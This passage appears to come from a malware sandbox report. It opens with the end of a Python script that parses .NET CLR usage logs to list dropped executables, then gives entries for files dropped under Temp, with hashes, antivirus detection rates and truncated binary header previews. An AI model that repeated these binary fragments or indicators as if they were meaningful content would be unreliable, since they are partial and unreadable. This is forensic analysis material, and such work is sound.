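        out.append(LoadedAssembly(name, path, ver, bits, display))
    return out


def diff_assemblies(log_a: str, log_b: str) -> Tuple[Set[str], Set[str]]:
    """Assemblies only in A and only in B: what one dropped executable
    bound to that its sibling did not (System.Data vs System.Xml above)."""
    a = {x.name for x in parse_usage_log(log_a)}
    b = {x.name for x in parse_usage_log(log_b)}
    return a - b, b - a


if __name__ == "__main__":
    for asm in parse_usage_log(SAMPLE_V4):
        print(f"{asm.name:<14} CLR {asm.clr_version} x{asm.bitness}  {asm.path}")
    only_a, only_b = diff_assemblies(SAMPLE_V2, SAMPLE_V4)
    print("only in v2 sample:", sorted(only_a), " only in v4 sample:", sorted(only_b))
```

Pointed at a live `%LOCALAPPDATA%\Microsoft\CLR_v*\UsageLogs` directory, the same parser gives a per-process list of executed .NET images and their bound assemblies without needing the executables themselves, which is useful when the droppers in `%TEMP%` have already been deleted.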
                                                              C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):78336
                                                              Entropy (8bit):7.244203070790308
                                                              Encrypted:false
                                                              SSDEEP:1536:T3ckKSVogho+PTw/TPShe4Xl8iZDlJC1b:oUoGo+PWb6h9bJC5
                                                              MD5:0E5F029EB6ECABF1E593E12211887506
                                                              SHA1:B905E0A28ED76C0BB6F0871CC5FFFA2E7F99642A
                                                              SHA-256:77450DEC4277B5643CE97196289923C019E28A0EF9946324D924A6BB8833E7EC
                                                              SHA-512:AC42A24C4A0E34933466530AEBB86E01442070F7878614438732186C578296BD018E467868CE767FA8D32072C871F34DD7E221B38FFDC4E4967662F47F4FBAE3
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                               • Antivirus: Metadefender, Detection: 30%
                                                              • Antivirus: ReversingLabs, Detection: 82%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............"...0.............^2... ...@....@.. ....................................@..................................2..O....@..|....................`.......1..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......0..............@..B................>2......H........6..$"...........X.................................................}.....(.......(.....r...p(....&*6.rk..p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0..L.............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o......{....o......{....o......{.
                                                              C:\Users\user\AppData\Local\Temp\2vze2wqfnvj\installer.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2332000
                                                              Entropy (8bit):7.710319682123012
                                                              Encrypted:false
                                                              SSDEEP:49152:0qeNVO4AFpy6/dV7FuYuiiZQCu9f0BTHgXhfSUHq:BEY42x/NuBgJ0ZgXxxHq
                                                              MD5:57A499F8970931ED49142A0392846212
                                                              SHA1:6F9D93587B0508F278A7D1ED66590F50163A45BD
                                                              SHA-256:4101EB5D347E4D5DF349296B506BFA34443A7D43000902849A22545F455E23C0
                                                              SHA-512:A361DC8085D8CB35FFF1C8650C32E53F4CFD5A717369FD6F512497BE20AD6682270AE1C5CCC162FF56DB010D7D1F1E17869562A4AAED3B8D0E08D1D81C72C0C6
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 64%
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....m^.................P...........^.......p....@...................................#...@......@...................@....... ..6....p...F............#.P....................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....F...p...F..................@..@....................................@..@........................................................
                                                              C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):15711928
                                                              Entropy (8bit):7.993466509508316
                                                              Encrypted:true
                                                              SSDEEP:393216:2fAlhvR8PZ5ECts3Rztsr5PSL0g7+Pgkt7/7DI:Dlhv2O1tfZi7//I
                                                              MD5:A9487E1960820EB2BA0019491D3B08CE
                                                              SHA1:349B4568DDF57B5C6C1E4A715B27029B287B3B4A
                                                              SHA-256:123C95CF9E3813BE75FE6D337B6A66F8C06898AE2D4B0B3E69E2E14954FF4776
                                                              SHA-512:DAB78AFF75017F039F7FEE67F3967BA9DD468430F9F1ECFFDE07DE70964131931208EE6DD97A19399D5F44D3AB8B5D21ABCD3D2766B1CAAF970E1BD1D69AE0DC
                                                              Malicious:false
                                                              Antivirus:
                                                               • Antivirus: Metadefender, Detection: 8%
                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....ujP.................P..........xd.......p....@..................................I...........@......................................(............{...C..........................................................P...L............................text....C.......D.................. ..`.itext.......`.......H.............. ..`.data........p.......T..............@....bss....PW...........b...................idata...............b..............@....tls.................r...................rdata...............r..............@..@.rsrc...(............t..............@..@.....................&..............@..@........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\4sgbvongjvu\AwesomePoolE1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):78336
                                                              Entropy (8bit):7.244203070790308
                                                              Encrypted:false
                                                              SSDEEP:1536:T3ckKSVogho+PTw/TPShe4Xl8iZDlJC1b:oUoGo+PWb6h9bJC5
                                                              MD5:0E5F029EB6ECABF1E593E12211887506
                                                              SHA1:B905E0A28ED76C0BB6F0871CC5FFFA2E7F99642A
                                                              SHA-256:77450DEC4277B5643CE97196289923C019E28A0EF9946324D924A6BB8833E7EC
                                                              SHA-512:AC42A24C4A0E34933466530AEBB86E01442070F7878614438732186C578296BD018E467868CE767FA8D32072C871F34DD7E221B38FFDC4E4967662F47F4FBAE3
                                                              Malicious:true
                                                              Antivirus:
                                                               • Antivirus: Metadefender, Detection: 30%
                                                              • Antivirus: ReversingLabs, Detection: 82%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............"...0.............^2... ...@....@.. ....................................@..................................2..O....@..|....................`.......1..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......0..............@..B................>2......H........6..$"...........X.................................................}.....(.......(.....r...p(....&*6.rk..p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0..L.............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o......{....o......{....o......{.
                                                              C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):523264
                                                              Entropy (8bit):7.563751397617382
                                                              Encrypted:false
                                                              SSDEEP:12288:rYNuYh2ZRYMY7bixB9cV/RxPrijyDrx4hlsGBcNlA/:VmCRYLEBSV/IAr6hNn
                                                              MD5:E252EF40FF9D0A528918215DB75A8EB9
                                                              SHA1:7AF26058E02C0E9AF73898350C2BF8E522734A8D
                                                              SHA-256:E6A6A7C6B86784485C614F333026D3C9525EED04CD137DF67BBB65AC10381828
                                                              SHA-512:EA1189B51FD2AAF917D560FBED38BB6E7C49C72B909220CA184958F5A17E21FD39CE1B9E3A1BEF7BFCD6B1E047DDE39CAEE894C39A3FF578B1F57BE6AF8D5306
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 28%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4.)`.....................V........... ........@.. .......................`............@.................................`...W........S...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....S.......T..................@..@.reloc.......@......................@..B........................H.......hf...\..........<...,............................................(....(9...*..(....*>..{.....X}....*z.(......}.....(....o ...}....*..0...........{............3.....(.....*..................0..^........{......,...;.......D.....}.....s....}.....{.....{....}......}......}.....{..........s!......{...........s....%..}....%..}....o....}.......}....8......{....o....}......{....}......}.............}.....{....{.......{.......Y}.....{....{....-...+M.{........{....X.{....{....
                                                              C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe.config
                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1860
                                                              Entropy (8bit):5.082358405175579
                                                              Encrypted:false
                                                              SSDEEP:24:2dHmh9J1IfyTlOyTsOTB5XTtIdcXCHnH2zUFBySGHyl:cGpOfyTl7TsOTBNTWSXCHH2zU3j
                                                              MD5:3F1498C07D8713FE5C315DB15A2A2CF3
                                                              SHA1:EF5F42FD21F6E72BDC74794F2496884D9C40BBFB
                                                              SHA-256:52CA39624F8FD70BC441D055712F115856BC67B37EFB860D654E4A8909106DC0
                                                              SHA-512:CB32CE5EF72548D1B0D27F3F254F4B67B23A0B662D0EF7AE12F9E3EF1B0A917B098368B434CAF54751C02C0F930E92CFFD384F105D8D79EE725DF4D97A559A3D
                                                              Malicious:true
                                                              Preview: <?xml version="1.0" encoding="utf-8" ?>....<configuration>.... <startup useLegacyV2RuntimeActivationPolicy="true">.... <supportedRuntime version="v2.0.50727"/>.... .... <supportedRuntime version="v3.5"/> "The .NET Framework version 3.0 and 3.5 use version 2.0.50727 of the CLR.".... -->.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0,Profile=Client" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.1,Profile=Client" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.1" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.2,Profile=Client" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.2" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.3,Profile=Client" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.3" />....
                                                              C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):78336
                                                              Entropy (8bit):7.244203070790308
                                                              Encrypted:false
                                                              SSDEEP:1536:T3ckKSVogho+PTw/TPShe4Xl8iZDlJC1b:oUoGo+PWb6h9bJC5
                                                              MD5:0E5F029EB6ECABF1E593E12211887506
                                                              SHA1:B905E0A28ED76C0BB6F0871CC5FFFA2E7F99642A
                                                              SHA-256:77450DEC4277B5643CE97196289923C019E28A0EF9946324D924A6BB8833E7EC
                                                              SHA-512:AC42A24C4A0E34933466530AEBB86E01442070F7878614438732186C578296BD018E467868CE767FA8D32072C871F34DD7E221B38FFDC4E4967662F47F4FBAE3
                                                              Malicious:true
                                                              Antivirus:
                                                               • Antivirus: Metadefender, Detection: 30%
                                                              • Antivirus: ReversingLabs, Detection: 82%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............"...0.............^2... ...@....@.. ....................................@..................................2..O....@..|....................`.......1..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......0..............@..B................>2......H........6..$"...........X.................................................}.....(.......(.....r...p(....&*6.rk..p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0..L.............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o......{....o......{....o......{.
                                                              C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):721408
                                                              Entropy (8bit):6.793648961271186
                                                              Encrypted:false
                                                              SSDEEP:12288:9p/S3sCPfhmxjjpmt0OlIhtYbJAvSq8ZlUfMcZMSIP/LrvfOh9lSPxTmg++K0E:TeSot0jOFAvS7ZufMcZMT/feh9lEN+4
                                                              MD5:57664817E1CE6474C6FB8201675AC09E
                                                              SHA1:C394CB4643EA0BC6AC762DA6D95F4910957E34CB
                                                              SHA-256:8DB01993653B78C7B862356616241C4C97ADCE8B705522CEFAC90B23E3572845
                                                              SHA-512:D8EA64D8D2F695165E0AA1519348277E93D65C0A19AA810110E49F8F2AA6F015FC892D78C1B4B7B2FD70F933120B9A9887C214DCBDDBD293B8EF5BBF2549C64D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ g..A.D.A.D.A.D.'.E.A.D.'.E.A.D.'.E.A.D.).E.A.D.).E.A.D.).E.A.D.'.E.A.D.A.D=A.D.(.E.A.D.(.D.A.D.(.E.A.DRich.A.D................PE..L....`.`.............................P............@.......................................@.....................................<................................M..........................@...........@...............0............................text....3.......4.................. ..`.txet.......P.......8.............. ..`.rdata..............................@..@.data...Ld..........................@....rsrc...............................@..@.reloc...M.......N..................@..B................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3953664
                                                              Entropy (8bit):7.994147516216309
                                                              Encrypted:true
                                                              SSDEEP:98304:PiYh58RGLPb/m86SUfCA3vuM5f56uH+BeWy50T9VuOGd:q+58Erb/mLfCA3vuM5fbeQWihh
                                                              MD5:CA391A385DA53FAE727E8B060FCB05C3
                                                              SHA1:FF84B68D99BFE9871BEC9AFFF4F7D8B8D804826F
                                                              SHA-256:69758B50E1E988C3D3EB40FA75AF54FCA809EE80DBAD18729C2F7D659D840FEE
                                                              SHA-512:83A3846D0411CFBD5B772BC4D0A1D1410D8499677F38BEB57AD525507D55258D3A812749E908F8076700504903017818492677BFB3E33A00B0E527ACC89281E2
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&^..b?..b?..b?..|m6.x?..|m'.U?..|m ..?..E..g?..b?...?..|m).c?..|m1.c?..|m7.c?..|m2.c?..Richb?..................PE..L......^..................;..bx......3........;...@.................................!`<.............................p0<......%<.<.......8.............................................................................;..............................text...b.;.......;................. ..`.rdata...P....;..R....;.............@..@.data...HWw..@<.. ....<.............@....rsrc...8............8<.............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1188864
                                                              Entropy (8bit):6.330420574637555
                                                              Encrypted:false
                                                              SSDEEP:24576:LfBCw13MC2/8HmwB7nfoZarGKPO/HIO9:zBVx8b9
                                                              MD5:7504A339516D6AB6F35C55CD96810040
                                                              SHA1:4092FD230E20809D2D091976660FDCE49B171FF0
                                                              SHA-256:3CD0DDF012ACBDA18B37DF1E6EF4195D9BE15D6E58C97C7CC21CEABF54C32E56
                                                              SHA-512:A34A0F954BF02BE534FF85AB5789CFFE429729D5B71D8F47C2EF610B95D07E1C1D340FF648D04DBE99D02052BCFB63123E35A7A6584C18D4AE206DBF5050A4A4
                                                              Malicious:true
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................n...........{............@..............................................@..............................Z*..................................................................................................................CODE....Dl.......n.................. ..`DATA............. ...r..............@...BSS.....5................................idata..Z*.......,..................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................$..............@..P........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):994304
                                                              Entropy (8bit):6.036504306101096
                                                              Encrypted:false
                                                              SSDEEP:24576:uxG8ox/wm+8tFB6NPPwmCjdhl6PdA+6FLTjv8ZxIQzXfAR+:uA9x/wSC5CIO
                                                              MD5:A0B220137332876ABC6DD8D91F2DD363
                                                              SHA1:C7F34A4F14DBDAFCEB52688C474E598EF2CEF3C4
                                                              SHA-256:9318F313739FE493CD524C55ADC5F1E2737E57049209245D6D917AAB83268DF8
                                                              SHA-512:0760C19274E1F480EC566973344867F52D6061A4E02D26E0F71770BDCB02C50BED12B4D179415213B0CE5DC0536C2B45C9F8A2AEBC46F53D98515785E66C718D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.............N7... ...@....@.. ....................................@..................................6..O....@..@....................`......`6..8............................................ ............... ..H............text...T.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`.......*..............@..B................/7......H........"..`............2..X............................................0..............!.....(.....(.......(....~....o....o.......o.......o.....o....o......s...........s.........s.........o ......2..,...o!.......,...o!.......,...o!......,..o!.......*..4....f..r........\.#.........P.<...................".("....*.r...p.....r#..p.....r5..p.....rG..p.....*..0..q...........!....(#...r...po$...s....o ...(....(......(%...o&...r...po'....(%....o(...t.............%.....o)...&........
                                                              C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):15711928
                                                              Entropy (8bit):7.993466509508316
                                                              Encrypted:true
                                                              SSDEEP:393216:2fAlhvR8PZ5ECts3Rztsr5PSL0g7+Pgkt7/7DI:Dlhv2O1tfZi7//I
                                                              MD5:A9487E1960820EB2BA0019491D3B08CE
                                                              SHA1:349B4568DDF57B5C6C1E4A715B27029B287B3B4A
                                                              SHA-256:123C95CF9E3813BE75FE6D337B6A66F8C06898AE2D4B0B3E69E2E14954FF4776
                                                              SHA-512:DAB78AFF75017F039F7FEE67F3967BA9DD468430F9F1ECFFDE07DE70964131931208EE6DD97A19399D5F44D3AB8B5D21ABCD3D2766B1CAAF970E1BD1D69AE0DC
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....ujP.................P..........xd.......p....@..................................I...........@......................................(............{...C..........................................................P...L............................text....C.......D.................. ..`.itext.......`.......H.............. ..`.data........p.......T..............@....bss....PW...........b...................idata...............b..............@....tls.................r...................rdata...............r..............@..@.rsrc...(............t..............@..@.....................&..............@..@........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):78336
                                                              Entropy (8bit):7.244203070790308
                                                              Encrypted:false
                                                              SSDEEP:1536:T3ckKSVogho+PTw/TPShe4Xl8iZDlJC1b:oUoGo+PWb6h9bJC5
                                                              MD5:0E5F029EB6ECABF1E593E12211887506
                                                              SHA1:B905E0A28ED76C0BB6F0871CC5FFFA2E7F99642A
                                                              SHA-256:77450DEC4277B5643CE97196289923C019E28A0EF9946324D924A6BB8833E7EC
                                                              SHA-512:AC42A24C4A0E34933466530AEBB86E01442070F7878614438732186C578296BD018E467868CE767FA8D32072C871F34DD7E221B38FFDC4E4967662F47F4FBAE3
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............"...0.............^2... ...@....@.. ....................................@..................................2..O....@..|....................`.......1..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......0..............@..B................>2......H........6..$"...........X.................................................}.....(.......(.....r...p(....&*6.rk..p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0..L.............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o......{....o......{....o......{.
                                                              C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):994304
                                                              Entropy (8bit):6.036504306101096
                                                              Encrypted:false
                                                              SSDEEP:24576:uxG8ox/wm+8tFB6NPPwmCjdhl6PdA+6FLTjv8ZxIQzXfAR+:uA9x/wSC5CIO
                                                              MD5:A0B220137332876ABC6DD8D91F2DD363
                                                              SHA1:C7F34A4F14DBDAFCEB52688C474E598EF2CEF3C4
                                                              SHA-256:9318F313739FE493CD524C55ADC5F1E2737E57049209245D6D917AAB83268DF8
                                                              SHA-512:0760C19274E1F480EC566973344867F52D6061A4E02D26E0F71770BDCB02C50BED12B4D179415213B0CE5DC0536C2B45C9F8A2AEBC46F53D98515785E66C718D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.............N7... ...@....@.. ....................................@..................................6..O....@..@....................`......`6..8............................................ ............... ..H............text...T.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`.......*..............@..B................/7......H........"..`............2..X............................................0..............!.....(.....(.......(....~....o....o.......o.......o.....o....o......s...........s.........s.........o ......2..,...o!.......,...o!.......,...o!......,..o!.......*..4....f..r........\.#.........P.<...................".("....*.r...p.....r#..p.....r5..p.....rG..p.....*..0..q...........!....(#...r...po$...s....o ...(....(......(%...o&...r...po'....(%....o(...t.............%.....o)...&........
                                                              C:\Users\user\AppData\Local\Temp\is-KTTI2.tmp\installer.tmp
                                                              Process:C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2570752
                                                              Entropy (8bit):6.387934906861299
                                                              Encrypted:false
                                                              SSDEEP:49152:rR/KpmZubPf2S8W2ILeWl+C1p9jWy5Mnd0wigbL:t/jtYLP1Sy5i0
                                                              MD5:B98F05A63FDC6865C82CB83483EE7286
                                                              SHA1:06BD6F94AAAB5462940B09D76CE1979E8108CEA1
                                                              SHA-256:0259CA56969BF3388F65985488CEBE287C0F592B4183B95EE415AD17F7F5F5FC
                                                              SHA-512:3B378A029FAA01EE8265DA9798AC5354FAAEAFED849BAD44131ABAE15DFF351689ED1D0C76A493CCE892D1C19506EEB4319128F580EA6937B35C4D3A7F70BDD0
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....m^..................%...........%.......%...@.......................... (...........@......@....................'.......&..5...0'...................................................... '.....................L.&.H.....&......................text.....%.......%................. ..`.itext...&....%..(....%............. ..`.data...dZ....%..\....%.............@....bss.....x...0&..........................idata...5....&..6....&.............@....didata.......&......@&.............@....edata........'......J&.............@..@.tls....D.....'..........................rdata..].... '......L&.............@..@.rsrc........0'......N&.............@..@............. (......:'.............@..@........................................................
                                                              C:\Users\user\AppData\Local\Temp\jkyaj5krzjz\safebits.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1188864
                                                              Entropy (8bit):6.330420574637555
                                                              Encrypted:false
                                                              SSDEEP:24576:LfBCw13MC2/8HmwB7nfoZarGKPO/HIO9:zBVx8b9
                                                              MD5:7504A339516D6AB6F35C55CD96810040
                                                              SHA1:4092FD230E20809D2D091976660FDCE49B171FF0
                                                              SHA-256:3CD0DDF012ACBDA18B37DF1E6EF4195D9BE15D6E58C97C7CC21CEABF54C32E56
                                                              SHA-512:A34A0F954BF02BE534FF85AB5789CFFE429729D5B71D8F47C2EF610B95D07E1C1D340FF648D04DBE99D02052BCFB63123E35A7A6584C18D4AE206DBF5050A4A4
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................n...........{............@..............................................@..............................Z*..................................................................................................................CODE....Dl.......n.................. ..`DATA............. ...r..............@...BSS.....5................................idata..Z*.......,..................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................$..............@..P........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\lxr1opmnwjh\safebits.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1188864
                                                              Entropy (8bit):6.330420574637555
                                                              Encrypted:false
                                                              SSDEEP:24576:LfBCw13MC2/8HmwB7nfoZarGKPO/HIO9:zBVx8b9
                                                              MD5:7504A339516D6AB6F35C55CD96810040
                                                              SHA1:4092FD230E20809D2D091976660FDCE49B171FF0
                                                              SHA-256:3CD0DDF012ACBDA18B37DF1E6EF4195D9BE15D6E58C97C7CC21CEABF54C32E56
                                                              SHA-512:A34A0F954BF02BE534FF85AB5789CFFE429729D5B71D8F47C2EF610B95D07E1C1D340FF648D04DBE99D02052BCFB63123E35A7A6584C18D4AE206DBF5050A4A4
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................n...........{............@..............................................@..............................Z*..................................................................................................................CODE....Dl.......n.................. ..`DATA............. ...r..............@...BSS.....5................................idata..Z*.......,..................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................$..............@..P........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):721408
                                                              Entropy (8bit):6.793648961271186
                                                              Encrypted:false
                                                              SSDEEP:12288:9p/S3sCPfhmxjjpmt0OlIhtYbJAvSq8ZlUfMcZMSIP/LrvfOh9lSPxTmg++K0E:TeSot0jOFAvS7ZufMcZMT/feh9lEN+4
                                                              MD5:57664817E1CE6474C6FB8201675AC09E
                                                              SHA1:C394CB4643EA0BC6AC762DA6D95F4910957E34CB
                                                              SHA-256:8DB01993653B78C7B862356616241C4C97ADCE8B705522CEFAC90B23E3572845
                                                              SHA-512:D8EA64D8D2F695165E0AA1519348277E93D65C0A19AA810110E49F8F2AA6F015FC892D78C1B4B7B2FD70F933120B9A9887C214DCBDDBD293B8EF5BBF2549C64D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ g..A.D.A.D.A.D.'.E.A.D.'.E.A.D.'.E.A.D.).E.A.D.).E.A.D.).E.A.D.'.E.A.D.A.D=A.D.(.E.A.D.(.D.A.D.(.E.A.DRich.A.D................PE..L....`.`.............................P............@.......................................@.....................................<................................M..........................@...........@...............0............................text....3.......4.................. ..`.txet.......P.......8.............. ..`.rdata..............................@..@.data...Ld..........................@....rsrc...............................@..@.reloc...M.......N..................@..B................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1188864
                                                              Entropy (8bit):6.330420574637555
                                                              Encrypted:false
